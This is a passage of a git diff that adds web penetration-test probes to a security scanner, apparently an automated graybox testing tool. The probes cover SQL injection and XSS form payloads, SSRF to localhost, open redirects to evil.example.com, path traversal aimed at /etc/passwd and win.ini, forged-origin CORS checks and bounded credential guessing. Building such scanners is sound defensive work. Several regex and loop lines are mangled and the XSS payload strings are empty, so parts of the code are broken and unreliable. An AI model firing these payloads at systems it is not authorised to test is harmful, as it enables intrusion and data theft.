+ """ + try: + probe_fn() + except requests.exceptions.ConnectionError: + self._record_error(probe_name, "target_unreachable") + except requests.exceptions.Timeout: + self._record_error(probe_name, "request_timeout") + except Exception as exc: + self._record_error(probe_name, self.safety.sanitize_error(str(exc))) + + def build_result(self, outcome: str = "completed", artifacts=None) -> GrayboxProbeRunResult: + """Return a typed probe result without changing legacy run() contracts.""" + return GrayboxProbeRunResult( + findings=list(self.findings), + artifacts=list(artifacts or []), + outcome=outcome, + ) + + def _record_error(self, probe_name, error_msg): + """Store a non-fatal error as an INFO GrayboxFinding.""" + self.findings.append(GrayboxFinding( + scenario_id=f"ERR-{probe_name}", + title=f"Probe error: {probe_name}", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={error_msg}"], + error=error_msg, + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py b/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py new file mode 100644 index 00000000..a80e4c2b --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/business_logic.py @@ -0,0 +1,391 @@ +""" +Business logic probes — A06 workflow bypass + A07 weak auth. +""" + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class BusinessLogicProbes(ProbeBase): + """ + PT-A06-01: workflow bypass (STATEFUL — requires allow_stateful_probes). + PT-A07-01: weak auth simulation (read-only). 
+ """ + + requires_auth = True + requires_regular_session = True + is_stateful = True + + def run(self): + if self._allow_stateful: + self.run_safe("workflow_bypass", self._test_workflow_bypass) + self.run_safe("validation_bypass", self._test_validation_bypass) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-01", + title="Business logic probes skipped", + status="inconclusive", + severity="INFO", + owasp="A06:2021", + evidence=["stateful_probes_disabled=True"], + )) + return self.findings + + def run_weak_auth(self, candidates, max_attempts): + """ + PT-A07-01 bounded weak-credential simulation. + + Read-only: only tests login, never modifies application state. + Includes lockout detection to abort if target starts blocking. + """ + budget = self.safety.clamp_attempts(max_attempts) + if not candidates: + return self.findings + + lockout_markers = [ + "account locked", "too many attempts", "temporarily blocked", + "account suspended", "try again later", "rate limit", + ] + + attempts = 0 + successes = [] + for cred in candidates[:budget]: + if ":" not in cred: + continue + username, password = cred.split(":", 1) + self.safety.throttle_auth() + session = self.auth.try_credentials(username, password) + attempts += 1 + if session: + successes.append(username) + session.close() + else: + check_session = self.auth.make_anonymous_session() + try: + login_url = self.auth.target_url + self.auth.target_config.login_path + resp = check_session.get(login_url, timeout=10) + body_lower = resp.text.lower() + if resp.status_code == 429 or any(m in body_lower for m in lockout_markers): + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-01", + title="Account lockout detected — weak auth aborted", + status="inconclusive", + severity="INFO", + owasp="A07:2021", + cwe=["CWE-307"], + evidence=[ + f"attempt_count={attempts}", + f"status={resp.status_code}", + ], + )) + return self.findings + except Exception: + pass + finally: + check_session.close() + if 
attempts >= budget: + break + + if successes: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-01", + title="Bounded weak-auth simulation", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-307"], + attack=["T1110"], + evidence=[ + f"attempt_count={attempts}", + f"success_count={len(successes)}", + f"first_success={successes[0]}", + ], + replay_steps=[ + "Run weak-auth simulation with bounded candidate list.", + "Observe successful login using guessed credentials.", + ], + remediation="Enforce strong credential policy, lockout, and throttling controls.", + )) + + return self.findings + + def _test_workflow_bypass(self): + """ + PT-A06-01: test insecure workflow transitions. + + Tests if regular user can access workflow endpoints that should + require elevated permissions or specific state transitions. + + For POST endpoints, includes the CSRF token so that CSRF rejection + doesn't mask a real authorization gap. + """ + if not self.auth.regular_session: + return + + endpoints = self.target_config.business_logic.workflow_endpoints + if not endpoints: + return + + # Resolve {id} placeholders using IDOR test_ids (default: try 1 and 2) + idor_ids = [1, 2] + for iep in self.target_config.access_control.idor_endpoints: + if iep.test_ids: + idor_ids = iep.test_ids + break + + for ep in endpoints: + path = ep.path + if "{id}" in path: + path = path.replace("{id}", str(idor_ids[0])) + self.safety.throttle() + url = self.target_url + path + method = ep.method.upper() + + try: + if method == "POST": + # Fetch the endpoint (or a page that carries CSRF tokens) to get + # a fresh CSRF token — otherwise Django/Rails may return 403 for + # missing CSRF, masking the real authorization check. 
+ csrf_token = None + csrf_field = self.auth.detected_csrf_field + if csrf_field: + csrf_token = self.auth.regular_session.cookies.get("csrftoken") or \ + self.auth.regular_session.cookies.get("csrf_token") + if not csrf_token and csrf_field: + try: + page_resp = self.auth.regular_session.get( + self.target_url + "/", timeout=10, + ) + csrf_token = self.auth.extract_csrf_value( + page_resp.text, csrf_field, + ) + except Exception: + pass + + payload = {} + headers = {"Referer": self.target_url + path} + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers["X-CSRFToken"] = csrf_token + resp = self.auth.regular_session.post( + url, data=payload, headers=headers, timeout=10, + ) + else: + resp = self.auth.regular_session.get(url, timeout=10) + except Exception: + continue + + if resp.status_code < 400: + body_lower = resp.text.lower() + denial_markers = ["access denied", "permission denied", "forbidden", + "not authorized", "unauthorized"] + if any(m in body_lower for m in denial_markers): + continue + + expected = ep.expected_guard + if expected and str(resp.status_code) != expected: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-01", + title="Workflow bypass — missing authorization guard", + status="vulnerable", + severity="HIGH", + owasp="A06:2021", + cwe=["CWE-841"], + attack=["T1078"], + evidence=[ + f"endpoint={url}", + f"method={method}", + f"expected_guard={expected}", + f"actual_status={resp.status_code}", + ], + replay_steps=[ + "Log in as regular user.", + f"Send {method} to {path}.", + f"Observe status {resp.status_code} instead of expected guard {expected}.", + ], + remediation="Enforce workflow state guards and role checks on all state-changing endpoints.", + )) + + def _test_validation_bypass(self): + """ + PT-A06-02: test business logic validation (negative amounts, invalid state transitions). + + Submits boundary-violating values to record endpoints and checks if the + server accepts them. 
Tests negative monetary amounts and forbidden state + transitions. + """ + if not self.auth.official_session: + return + + endpoints = self.target_config.business_logic.record_endpoints + if not endpoints: + return + + import re + + idor_ids = [1, 2] + for iep in self.target_config.access_control.idor_endpoints: + if iep.test_ids: + idor_ids = iep.test_ids + break + + bypass_evidence = [] + + for ep in endpoints: + path = ep.path + if "{id}" in path: + path = path.replace("{id}", str(idor_ids[0])) + url = self.target_url + path + + # Step 1: GET the form to extract current state and CSRF token + self.safety.throttle() + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + if page.status_code != 200: + continue + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Extract all form fields with current values. + # Parse (any type), ', + page.text, re.I | re.DOTALL, + ): + form_fields[m.group(1)] = m.group(2).strip() + # Extract ', + page.text, re.I | re.DOTALL, + ): + sel_name = sel.group(1) + sel_body = sel.group(2) + opt = re.search(r']*selected[^>]*value=["\']([^"\']+)', sel_body, re.I) + if not opt: + opt = re.search(r']*value=["\']([^"\']+)["\'][^>]*selected', sel_body, re.I) + if opt: + form_fields[sel_name] = opt.group(1) + + current_status = form_fields.get(ep.status_field) + + # Test A: Negative amount + self.safety.throttle() + payload = dict(form_fields) + payload[ep.amount_field] = "-9999.99" + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers = {"Referer": url} + if csrf_token: + headers["X-CSRFToken"] = csrf_token + + try: + resp = self.auth.official_session.post( + url, data=payload, headers=headers, + timeout=10, allow_redirects=False, + ) + except Exception: + resp = None + + if resp is not None: + # Success indicators: 302 redirect (form accepted) or 200 without error + accepted = 
resp.status_code in (301, 302) + if not accepted and resp.status_code == 200: + body_lower = resp.text.lower() + error_markers = ["must be", "invalid", "error", "cannot", "negative"] + accepted = not any(m in body_lower for m in error_markers) + if accepted: + bypass_evidence.append(f"negative_amount_accepted=True; endpoint={path}") + + # Test B: Invalid state transition (if transitions are configured) + if ep.valid_transitions and current_status: + valid_next = set(ep.valid_transitions.get(current_status, [])) + # Find an invalid target state + all_states = set() + for targets in ep.valid_transitions.values(): + all_states.update(targets) + all_states.update(ep.valid_transitions.keys()) + invalid_states = all_states - valid_next - {current_status} + + if invalid_states: + invalid_target = sorted(invalid_states)[0] + self.safety.throttle() + + # Re-fetch CSRF token (may have been consumed) + if csrf_field: + try: + page2 = self.auth.official_session.get(url, timeout=10) + csrf_token = self.auth.extract_csrf_value(page2.text, csrf_field) + except Exception: + pass + + payload2 = dict(form_fields) + payload2[ep.status_field] = invalid_target + payload2[ep.amount_field] = form_fields.get(ep.amount_field, "100.00") + if csrf_token and csrf_field: + payload2[csrf_field] = csrf_token + headers2 = {"Referer": url} + if csrf_token: + headers2["X-CSRFToken"] = csrf_token + + try: + resp2 = self.auth.official_session.post( + url, data=payload2, headers=headers2, + timeout=10, allow_redirects=False, + ) + except Exception: + resp2 = None + + if resp2 is not None: + accepted2 = resp2.status_code in (301, 302) + if not accepted2 and resp2.status_code == 200: + body_lower = resp2.text.lower() + error_markers = ["must be", "invalid", "error", "cannot", "blocked", "transition"] + accepted2 = not any(m in body_lower for m in error_markers) + if accepted2: + bypass_evidence.append( + f"invalid_transition_accepted=True; " + f"from={current_status}; to={invalid_target}; 
endpoint={path}" + ) + + if bypass_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-02", + title="Business logic validation bypass", + status="vulnerable", + severity="HIGH", + owasp="A06:2021", + cwe=["CWE-20", "CWE-840"], + attack=["T1190"], + evidence=bypass_evidence, + replay_steps=[ + "Log in as authenticated user.", + "Submit form with negative amount or invalid state transition.", + "Observe server accepts the invalid input.", + ], + remediation="Enforce server-side validation for monetary amounts (>= 0) " + "and business state machine transitions. " + "Never rely on client-side validation alone.", + )) + elif endpoints: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-02", + title="Business logic validation — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A06:2021", + evidence=[f"endpoints_tested={len(endpoints)}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/injection.py b/extensions/business/cybersec/red_mesh/graybox/probes/injection.py new file mode 100644 index 00000000..1326881d --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/injection.py @@ -0,0 +1,589 @@ +""" +Injection probes — A03 + A05 + API7. +""" + +import re + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class InjectionProbes(ProbeBase): + """ + PT-A05-01: controlled injection on login form. + PT-A03-01: authenticated injection on discovered forms. + PT-A03-02: stored XSS (stateful — gated). + PT-API7-01: SSRF checks on URL-fetch endpoints. 
+ """ + + requires_auth = True + requires_regular_session = False + is_stateful = False + + def run(self): + self.run_safe("login_injection", self._test_login_injection) + if self.auth.official_session: + self.run_safe("authenticated_injection", self._test_authenticated_injection) + if self._allow_stateful: + self.run_safe("stored_xss", self._test_stored_xss) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored XSS probe skipped: stateful probes disabled", + status="inconclusive", + severity="INFO", + owasp="A03:2021", + evidence=["stateful_probes_disabled=True", + "reason=stored_xss_writes_data_to_target"], + )) + self.run_safe("ssrf", self._test_ssrf) + self.run_safe("open_redirect", self._test_open_redirect) + if self.auth.official_session: + self.run_safe("path_traversal", self._test_path_traversal) + return self.findings + + def _test_login_injection(self): + """PT-A05-01: inject into login form fields (unauthenticated).""" + session = self.auth.make_anonymous_session() + login_url = self.target_url + self.target_config.login_path + + payloads = [ + ("xss", '', "CWE-79"), + ("sqli", "' OR '1'='1", "CWE-89"), + ] + + try: + page = session.get(login_url, timeout=10) + except Exception: + session.close() + return + + # Extract CSRF token if present + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + vulnerable = [] + for label, payload, cwe in payloads: + self.safety.throttle() + form_data = { + self.target_config.username_field: payload, + self.target_config.password_field: "test", + } + if csrf_token and csrf_field: + form_data[csrf_field] = csrf_token + + try: + resp = session.post(login_url, data=form_data, timeout=10) + except Exception: + continue + + # Check for reflection + if payload in resp.text: + vulnerable.append((label, cwe, payload)) + + session.close() + + if vulnerable: + for label, cwe, payload in vulnerable: 
+ self.findings.append(GrayboxFinding( + scenario_id="PT-A05-01", + title=f"Reflected {label.upper()} in login form", + status="vulnerable", + severity="HIGH" if label == "sqli" else "MEDIUM", + owasp="A05:2021" if label == "sqli" else "A03:2021", + cwe=[cwe], + evidence=[ + f"endpoint={login_url}", + f"field={self.target_config.username_field}", + f"payload={payload}", + "payload_reflected=True", + ], + replay_steps=[ + f"Submit {payload} in the username field of {self.target_config.login_path}.", + "Observe payload reflected in the response.", + ], + remediation="Apply input validation and output encoding on all form fields.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A05-01", + title="Login form injection — no reflection detected", + status="not_vulnerable", + severity="INFO", + owasp="A05:2021", + evidence=[f"payloads_tested={len(payloads)}"], + )) + + def _test_authenticated_injection(self): + """ + PT-A03-01: inject into authenticated form fields. + + Tests each discovered form's text inputs with XSS/SQLi payloads. + Skips login form (already tested by _test_login_injection). 
+ """ + if not self.discovered_forms: + return + + payloads = [ + ("xss", "", "CWE-79"), + ("sqli", "' OR '1'='1", "CWE-89"), + ] + login_path = self.target_config.login_path + tested = 0 + vulnerable_forms = [] + + for form_action in self.discovered_forms: + if form_action == login_path: + continue + self.safety.throttle() + url = self.target_url + form_action + + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + # Extract input field names + input_names = re.findall( + r']+name=["\']([^"\']+)["\'][^>]*type=["\']?text', + page.text, re.IGNORECASE, + ) + textarea_names = re.findall( + r']+name=["\']([^"\']+)["\']', + page.text, re.IGNORECASE, + ) + all_inputs = input_names + textarea_names + if not all_inputs: + continue + + # Include CSRF token + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + for label, payload, cwe in payloads: + self.safety.throttle() + form_data = {name: payload for name in all_inputs} + if csrf_token and csrf_field: + form_data[csrf_field] = csrf_token + + try: + resp = self.auth.official_session.post(url, data=form_data, timeout=10) + except Exception: + continue + tested += 1 + + if payload in resp.text: + vulnerable_forms.append((form_action, label, cwe, all_inputs[0])) + + for form_action, label, cwe, field in vulnerable_forms: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-01", + title=f"Reflected {label.upper()} in authenticated form", + status="vulnerable", + severity="HIGH" if label == "sqli" else "MEDIUM", + owasp="A03:2021", + cwe=[cwe], + evidence=[ + f"endpoint={self.target_url + form_action}", + f"field={field}", + "payload_reflected=True", + ], + replay_steps=[ + "Log in as authenticated user.", + f"Submit payload in {field} at {form_action}.", + "Observe payload reflected in the response.", + ], + remediation="Apply input validation and output encoding on all form 
fields.", + )) + + if tested > 0 and not vulnerable_forms: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-01", + title="Authenticated injection — no reflection detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"forms_tested={tested}"], + )) + + def _test_stored_xss(self): + """ + PT-A03-02: stored XSS via authenticated form submission. + + Submits canary payload via POST to text inputs, then reads back + via GET to detect unescaped reflection. Gated behind allow_stateful. + """ + if not self.discovered_forms: + return + + import uuid + canary = f"XSS-CANARY-{uuid.uuid4().hex[:8]}" + payload = f"" + skip_paths = {self.target_config.login_path, self.target_config.logout_path} + + tested = 0 + for form_action in self.discovered_forms[:3]: + if form_action in skip_paths: + continue + self.safety.throttle() + url = self.target_url + form_action + + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + input_names = re.findall( + r']+name=["\']([^"\']+)["\'][^>]*type=["\']?text', + page.text, re.IGNORECASE, + ) + textarea_names = re.findall( + r']+name=["\']([^"\']+)["\']', + page.text, re.IGNORECASE, + ) + all_inputs = input_names + textarea_names + if not all_inputs: + continue + + form_data = {name: payload for name in all_inputs} + csrf_field = self.auth.detected_csrf_field + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + if csrf_token: + form_data[csrf_field] = csrf_token + + try: + self.auth.official_session.post(url, data=form_data, timeout=10) + except Exception: + continue + tested += 1 + + self.safety.throttle() + try: + readback = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + if canary in readback.text and payload in readback.text: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored cross-site scripting (XSS)", + status="vulnerable", + severity="HIGH", + 
owasp="A03:2021", + cwe=["CWE-79"], + attack=["T1059.007"], + evidence=[ + f"endpoint={url}", + f"input_fields={', '.join(all_inputs)}", + f"canary={canary}", + "payload_reflected_unescaped=True", + ], + replay_steps=[ + "Log in as authenticated user.", + f"POST XSS payload to {form_action} in field {all_inputs[0]}.", + f"GET {form_action} and observe unescaped payload in response.", + ], + remediation="Apply output encoding on all user-supplied content. " + "Use Content-Security-Policy to mitigate impact.", + )) + return + + if tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored XSS — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"forms_tested={tested}"], + )) + + def _test_ssrf(self): + """ + PT-API7-01: SSRF checks on URL-fetch endpoints. + + Tests configured endpoints for server-side URL fetching. + Detects reflected SSRF and timing-based hints for blind SSRF. + """ + ssrf_endpoints = self.target_config.injection.ssrf_endpoints + if not ssrf_endpoints: + return + + import time as _time + payload_url = "http://127.0.0.1:1/internal-probe" + baseline_url = "http://example.invalid/nonexistent" + + for ep in ssrf_endpoints: + self.safety.throttle() + url = self.target_url + "/" + ep.path.lstrip("/") + session = self.auth.official_session or self.auth.anon_session + + try: + t0 = _time.monotonic() + session.get(url, params={ep.param: baseline_url}, timeout=10) + baseline_ms = (_time.monotonic() - t0) * 1000 + except Exception: + continue + + try: + t0 = _time.monotonic() + resp = session.get(url, params={ep.param: payload_url}, timeout=10) + probe_ms = (_time.monotonic() - t0) * 1000 + except Exception: + continue + + if resp.status_code == 200 and "internal-probe" in resp.text: + self.findings.append(GrayboxFinding( + scenario_id="PT-API7-01", + title="Server-side request forgery", + status="vulnerable", + severity="MEDIUM", + owasp="API7:2023", + cwe=["CWE-918"], 
+ attack=["T1190"], + evidence=[ + f"endpoint={url}", + f"payload={payload_url}", + f"status={resp.status_code}", + ], + replay_steps=[ + f"Request GET {ep.path} with {ep.param}={payload_url}.", + "Observe server-side fetch of local callback URL.", + ], + remediation="Apply strict outbound URL allowlists and block local network ranges.", + )) + return + + if probe_ms > baseline_ms + 2000: + self.findings.append(GrayboxFinding( + scenario_id="PT-API7-01", + title="Possible blind SSRF (timing anomaly)", + status="inconclusive", + severity="LOW", + owasp="API7:2023", + cwe=["CWE-918"], + attack=["T1190"], + evidence=[ + f"endpoint={url}", + f"probe_ms={probe_ms:.0f}", + f"baseline_ms={baseline_ms:.0f}", + ], + replay_steps=[ + f"Request GET {ep.path} with {ep.param}={payload_url}.", + "Compare response time against baseline with non-routable URL.", + ], + remediation="Investigate with out-of-band callback to confirm blind SSRF.", + )) + return + + def _test_open_redirect(self): + """ + PT-A01-04: test URL parameters for open redirect vulnerabilities. + + Tests common redirect parameter names (next, url, redirect, return_to, + continue, dest, goto, forward) with an external domain payload. + Checks if the response issues a redirect to the attacker-controlled domain. + + Read-only: only sends GET requests with modified query parameters. 
+ """ + session = self.auth.official_session or self.auth.anon_session + if not session: + return + + redirect_params = [ + "next", "url", "redirect", "redirect_url", "return_to", "return", + "continue", "dest", "destination", "goto", "forward", "redir", + "returnUrl", "redirect_uri", "callback", + ] + payload = "//evil.example.com" + payload_alt = "https://evil.example.com" + + # Test against: login page (common redirect after login), discovered routes + test_paths = [self.target_config.login_path, self.target_config.logout_path] + for route in self.discovered_routes: + test_paths.append(route) + # Deduplicate + seen = set() + unique_paths = [] + for p in test_paths: + if p and p not in seen: + seen.add(p) + unique_paths.append(p) + + tested = 0 + vulnerable_evidence = [] + + for path in unique_paths[:10]: # cap to avoid excessive requests + for param in redirect_params: + self.safety.throttle() + url = self.target_url + path + try: + resp = session.get( + url, params={param: payload}, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + # Check for redirect to evil domain + if resp.status_code in (301, 302, 303, 307, 308): + location = resp.headers.get("Location", "") + if "evil.example.com" in location: + vulnerable_evidence.append( + f"endpoint={path}; param={param}; location={location}" + ) + break # one redirect per path is enough + + # Also test the alternate payload (full URL) + if not vulnerable_evidence or vulnerable_evidence[-1].split(";")[0] != f"endpoint={path}": + self.safety.throttle() + try: + resp2 = session.get( + url, params={param: payload_alt}, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + if resp2.status_code in (301, 302, 303, 307, 308): + location2 = resp2.headers.get("Location", "") + if "evil.example.com" in location2: + vulnerable_evidence.append( + f"endpoint={path}; param={param}; location={location2}" + ) + break + + if len(vulnerable_evidence) >= 3: + 
break # enough evidence + + if vulnerable_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-04", + title="Open redirect via URL parameter", + status="vulnerable", + severity="MEDIUM", + owasp="A01:2021", + cwe=["CWE-601"], + attack=["T1566"], + evidence=vulnerable_evidence, + replay_steps=[ + "Navigate to the vulnerable endpoint with redirect parameter.", + f"Set parameter to {payload} or {payload_alt}.", + "Observe 3xx redirect to attacker-controlled domain.", + ], + remediation="Validate redirect targets against a server-side allowlist. " + "Use relative paths only, or verify the destination host " + "matches your domain. Never pass user input directly to " + "Location headers.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-04", + title="Open redirect — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + evidence=[f"parameters_tested={tested}"], + )) + + def _test_path_traversal(self): + """ + PT-A03-03: test parameters for directory traversal vulnerabilities. + + Tests query parameters and path segments in discovered routes with + path traversal payloads. Checks response body for OS file content + markers (e.g. root:x: from /etc/passwd). + + Read-only: only sends GET requests with modified parameters. 
+ """ + session = self.auth.official_session + if not session: + return + + traversal_payloads = [ + ("../../../../../../etc/passwd", ["root:x:", "root:*:", "daemon:", "nobody:"]), + ("..\\..\\..\\..\\..\\..\\windows\\win.ini", ["[extensions]", "[fonts]", "[mci extensions]"]), + ("....//....//....//....//etc/passwd", ["root:x:", "root:*:"]), # filter bypass + ] + # Common parameter names that might accept file paths + file_params = [ + "file", "path", "page", "doc", "document", "template", "include", + "name", "folder", "dir", "download", "filename", "filepath", + "view", "content", "layout", "resource", + ] + + # Collect routes that have query-like structure or path parameters + test_routes = [] + for route in self.discovered_routes: + test_routes.append(route) + # Always test the root as well + if "/" not in test_routes: + test_routes.append("/") + + tested = 0 + vulnerable_evidence = [] + + for route in test_routes[:10]: # cap to avoid excessive requests + url = self.target_url + route + + # Strategy 1: inject via query parameters + for param in file_params: + if tested > 60: + break # hard cap on total requests + for payload, markers in traversal_payloads: + self.safety.throttle() + try: + resp = session.get(url, params={param: payload}, timeout=10) + except Exception: + continue + tested += 1 + + if resp.status_code == 200: + body = resp.text + if any(m in body for m in markers): + vulnerable_evidence.append( + f"endpoint={route}; param={param}; payload={payload}" + ) + break # one hit per route+param is enough + if vulnerable_evidence: + break # found a hit on this route, move on + + if len(vulnerable_evidence) >= 3: + break + + if vulnerable_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-03", + title="Path traversal — file content disclosed", + status="vulnerable", + severity="HIGH", + owasp="A03:2021", + cwe=["CWE-22"], + attack=["T1083"], + evidence=vulnerable_evidence, + replay_steps=[ + "Log in as authenticated user.", + f"Request 
GET with traversal payload in file parameter.", + "Observe OS file contents (e.g. /etc/passwd) in response body.", + ], + remediation="Validate and sanitize all file path inputs server-side. " + "Use a whitelist of allowed files, canonicalize paths, " + "and ensure they stay within the application's base directory. " + "Never pass user input directly to file system operations.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-03", + title="Path traversal — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"requests_tested={tested}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py b/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py new file mode 100644 index 00000000..f34473c8 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py @@ -0,0 +1,856 @@ +""" +Security misconfiguration probes — A02 debug/CORS/headers/cookies/CSRF/session. 
+""" + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class MisconfigProbes(ProbeBase): + """PT-A02-01..06: debug exposure, CORS, headers, cookies, CSRF bypass, session token.""" + + requires_auth = False + requires_regular_session = False + is_stateful = False + + def run(self): + self.run_safe("debug_exposure", self._test_debug_exposure) + self.run_safe("cors", self._test_cors) + self.run_safe("security_headers", self._test_security_headers) + self.run_safe("cookie_attributes", self._test_cookie_attributes) + self.run_safe("csrf_bypass", self._test_csrf_bypass) + self.run_safe("session_token", self._test_session_token) + self.run_safe("login_rate_limiting", self._test_login_rate_limiting) + self.run_safe("password_reset_token", self._test_password_reset_token) + self.run_safe("session_fixation", self._test_session_fixation) + self.run_safe("account_enumeration", self._test_account_enumeration) + return self.findings + + def _test_debug_exposure(self): + """PT-A02-01: check debug/config endpoints for information disclosure.""" + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + debug_paths = self.target_config.misconfig.debug_paths + exposed = [] + for path in debug_paths: + self.safety.throttle() + url = self.target_url + path + try: + resp = session.get(url, timeout=10) + except Exception: + continue + if resp.status_code == 200 and len(resp.text) > 50: + exposed.append(path) + + if exposed: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-01", + title="Debug/config endpoint exposed", + status="vulnerable", + severity="MEDIUM", + owasp="A02:2021", + cwe=["CWE-200"], + evidence=[f"exposed_paths={', '.join(exposed)}"], + remediation="Disable debug endpoints in production. 
Restrict access by IP or authentication.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-01", + title="Debug endpoints — not exposed", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"paths_tested={len(debug_paths)}"], + )) + + def _test_cors(self): + """PT-A02-02: check for permissive CORS configuration. + + Tests both the root URL and discovered API routes, since many apps + only set CORS headers on API endpoints (e.g. /api/*). + """ + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + # Build candidate URLs: root + configured endpoints + discovered API routes. + # Many apps only set CORS headers on API routes, so we must test those too. + test_paths = ["/"] + # Add configured endpoints (IDOR, admin, workflow) — these are known API paths + for ep in self.target_config.access_control.idor_endpoints: + test_paths.append(ep.path.replace("{id}", "1")) + for ep in self.target_config.access_control.admin_endpoints: + test_paths.append(ep.path) + for ep in self.target_config.business_logic.workflow_endpoints: + test_paths.append(ep.path.replace("{id}", "1")) + # Add discovered API-like routes + for route in self.discovered_routes: + if "/api/" in route.lower(): + test_paths.append(route) + # Deduplicate while preserving order + seen = set() + unique_paths = [] + for p in test_paths: + if p not in seen: + seen.add(p) + unique_paths.append(p) + + worst_finding = None + for path in unique_paths: + self.safety.throttle() + try: + resp = session.get( + self.target_url + path, + headers={"Origin": "http://evil.example.com"}, + timeout=10, + allow_redirects=False, + ) + except Exception: + continue + + acao = resp.headers.get("Access-Control-Allow-Origin", "") + acac = resp.headers.get("Access-Control-Allow-Credentials", "").lower() + + if acao == "*": + finding = GrayboxFinding( + scenario_id="PT-A02-02", + title="Permissive CORS: wildcard origin", + status="vulnerable", + 
severity="HIGH" if acac == "true" else "MEDIUM", + owasp="A02:2021", + cwe=["CWE-942"], + evidence=[ + f"path={path}", + f"access_control_allow_origin={acao}", + f"allow_credentials={acac}", + ], + remediation="Restrict Access-Control-Allow-Origin to trusted domains. Never use * with credentials.", + ) + if not worst_finding or finding.severity == "HIGH": + worst_finding = finding + elif acao == "http://evil.example.com": + severity = "HIGH" if acac == "true" else "MEDIUM" + finding = GrayboxFinding( + scenario_id="PT-A02-02", + title="CORS reflects arbitrary origin", + status="vulnerable", + severity=severity, + owasp="A02:2021", + cwe=["CWE-942"], + evidence=[ + f"path={path}", + f"access_control_allow_origin={acao}", + f"allow_credentials={acac}", + ], + remediation="Validate the Origin header against an allowlist. Do not reflect arbitrary origins.", + ) + if not worst_finding or severity == "HIGH": + worst_finding = finding + + if worst_finding: + self.findings.append(worst_finding) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-02", + title="CORS configuration — no misconfiguration detected", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"paths_tested={len(unique_paths)}"], + )) + + def _test_security_headers(self): + """PT-A02-03: check for missing security headers.""" + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + self.safety.throttle() + try: + resp = session.get(self.target_url + "/", timeout=10) + except Exception: + return + + headers = resp.headers + missing = [] + checked = [ + "X-Frame-Options", + "X-Content-Type-Options", + "Strict-Transport-Security", + "Content-Security-Policy", + "X-XSS-Protection", + ] + for h in checked: + if h.lower() not in {k.lower(): k for k in headers}: + missing.append(h) + + if missing: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-03", + title="Missing security headers", + status="vulnerable", + 
